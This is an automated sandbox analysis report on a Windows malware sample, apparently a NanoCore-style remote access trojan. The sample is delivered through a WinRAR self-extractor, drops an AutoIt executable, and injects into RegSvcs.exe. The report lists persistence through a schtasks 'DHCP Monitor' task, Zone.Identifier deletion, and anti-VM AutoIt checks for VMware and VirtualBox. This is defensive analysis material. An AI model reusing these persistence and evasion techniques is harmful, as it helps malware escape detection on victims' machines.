    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: dUzAkYsvl8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: dUzAkYsvl8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: dUzAkYsvl8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: dUzAkYsvl8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: dUzAkYsvl8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: dUzAkYsvl8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: dUzAkYsvl8.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: dUzAkYsvl8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: dUzAkYsvl8.exe, 00000000.00000000.289072563.0000000000222000.00000002.00020000.sdmp
    Source: Binary string: RegSvcs.pdb, source: dhcpmon.exe, 00000010.00000002.347719934.0000000000D32000.00000002.00020000.sdmp
    Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000005.00000002.559058243.0000000003A79000.00000004.00000001.sdmp
    Source: Binary string: RegSvcs.pdb source: dhcpmon.exe
    Source: dUzAkYsvl8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: dUzAkYsvl8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: dUzAkYsvl8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: dUzAkYsvl8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: dUzAkYsvl8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

    Data Obfuscation:

    barindex
    .NET source code contains potential unpackerShow sources
    Source: 5.2.RegSvcs.exe.500000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 5.2.RegSvcs.exe.500000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020E336 push ecx; ret 0_2_0020E349
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020D870 push eax; ret 0_2_0020D88E
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01146BD5 push ecx; ret 4_2_01146BE8
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01146BD5 push ecx; ret 10_2_01146BE8
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01146BD5 push ecx; ret 20_2_01146BE8
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0113EE30 LoadLibraryA,GetProcAddress,4_2_0113EE30
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeFile created: C:\Users\user\77066510\__tmp_rar_sfx_access_check_5166187Jump to behavior
    Source: 5.2.RegSvcs.exe.500000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
    Source: 5.2.RegSvcs.exe.500000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

    Persistence and Installation Behavior:

    barindex
    Drops PE files with a suspicious file extensionShow sources
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeFile created: C:\Users\user\77066510\cjlaro.pifJump to dropped file
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeFile created: C:\Users\user\77066510\cjlaro.pifJump to dropped file
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

    Boot Survival:

    barindex
    Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp1EC2.tmp'

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011643FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,4_2_011643FF
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011AA2EA IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,4_2_011AA2EA
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_011643FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_011643FF
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_011AA2EA IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_011AA2EA
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_011643FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,20_2_011643FF
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion:

    barindex
    Yara detected AntiVM autoit scriptShow sources
    Source: Yara matchFile source: Process Memory Space: cjlaro.pif PID: 5028, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: cjlaro.pif PID: 7152, type: MEMORYSTR
    Source: C:\Users\user\77066510\cjlaro.pif TID: 4968Thread sleep count: 74 > 30Jump to behavior
    Source: C:\Users\user\77066510\cjlaro.pif TID: 4968Thread sleep count: 105 > 30Jump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5496Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Users\user\77066510\cjlaro.pif TID: 7144Thread sleep count: 68 > 30Jump to behavior
    Source: C:\Users\user\77066510\cjlaro.pif TID: 7144Thread sleep count: 85 > 30Jump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3450Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 5826Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: foregroundWindowGot 667Jump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: cjlaro.pif, 00000004.00000003.320833602.0000000004CFF000.00000004.00000001.sdmpBinary or memory string: VMwaretray.exe
    Source: cjlaro.pif, 00000014.00000003.355134074.0000000003911000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
    Source: cjlaro.pif, 00000014.00000003.374937841.0000000003921000.00000004.00000001.sdmpBinary or memory string: rocessExists("VboxService.exe") Then
    Source: cjlaro.pif, 00000014.00000003.375222511.0000000003936000.00000004.00000001.sdmpBinary or memory string: VMwareUser.exeE97637D6X7|s
    Source: cjlaro.pif, 00000004.00000003.310288716.0000000004CD1000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
    Source: cjlaro.pif, 00000014.00000003.375222511.0000000003936000.00000004.00000001.sdmpBinary or memory string: VMwaretray.exe+3
    Source: cjlaro.pif, 00000004.00000003.330888891.0000000004CDC000.00000004.00000001.sdmpBinary or memory string: VMwareUser.exe5FB536C7
    Source: cjlaro.pif, 00000014.00000003.375222511.0000000003936000.00000004.00000001.sdmpBinary or memory string: VMwareService.exe
    Source: cjlaro.pif, 00000014.00000002.380204454.0000000001577000.00000004.00000020.sdmpBinary or memory string: om&Ven_NECVMWar&Prod_VMware_SATA
    Source: cjlaro.pif, 00000014.00000003.374937841.0000000003921000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then
    Source: cjlaro.pif, 00000004.00000003.320833602.0000000004CFF000.00000004.00000001.sdmp, cjlaro.pif, 00000014.00000003.375222511.0000000003936000.00000004.00000001.sdmpBinary or memory string: VBoxTray.exe
    Source: cjlaro.pif, 00000014.00000003.374937841.0000000003921000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
    Source: cjlaro.pif, 00000014.00000002.380204454.0000000001577000.00000004.00000020.sdmpBinary or memory string: 63}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d8Y
    Source: cjlaro.pif, 00000004.00000003.310288716.0000000004CD1000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenN8b
    Source: cjlaro.pif, 00000014.00000003.374937841.0000000003921000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thennw9
    Source: cjlaro.pif, 00000004.00000003.320782139.0000000004CE3000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenN8
    Source: cjlaro.pif, 00000004.00000003.320833602.0000000004CFF000.00000004.00000001.sdmpBinary or memory string: VboxService.exe"6
    Source: cjlaro.pif, 00000014.00000003.375222511.0000000003936000.00000004.00000001.sdmpBinary or memory string: VboxService.exe
    Source: cjlaro.pif, 00000004.00000003.310288716.0000000004CD1000.00000004.00000001.sdmp, cjlaro.pif, 00000014.00000003.374937841.0000000003921000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
    Source: RegSvcs.exe, 00000005.00000002.556279118.0000000000E08000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020D353 VirtualQuery,GetSystemInfo,0_2_0020D353
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001FA307 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,0_2_001FA307
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020AFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0020AFB9
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_00219FD3 FindFirstFileExA,0_2_00219FD3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0116399B GetFileAttributesW,FindFirstFileW,FindClose,4_2_0116399B
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01182408 FindFirstFileW,LdrInitializeThunk,Sleep,FindNextFileW,FindClose,4_2_01182408
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0117280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_0117280D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011A8877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,4_2_011A8877
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01161A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_01161A73
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0118CAE7 FindFirstFileW,FindNextFileW,FindClose,4_2_0118CAE7
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0117BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,4_2_0117BCB3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0117BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0117BF17
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0118DE7C FindFirstFileW,FindClose,4_2_0118DE7C
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01182408 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_01182408
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0116399B GetFileAttributesW,FindFirstFileW,FindClose,10_2_0116399B
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0117280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0117280D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_011A8877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_011A8877
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01161A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_01161A73
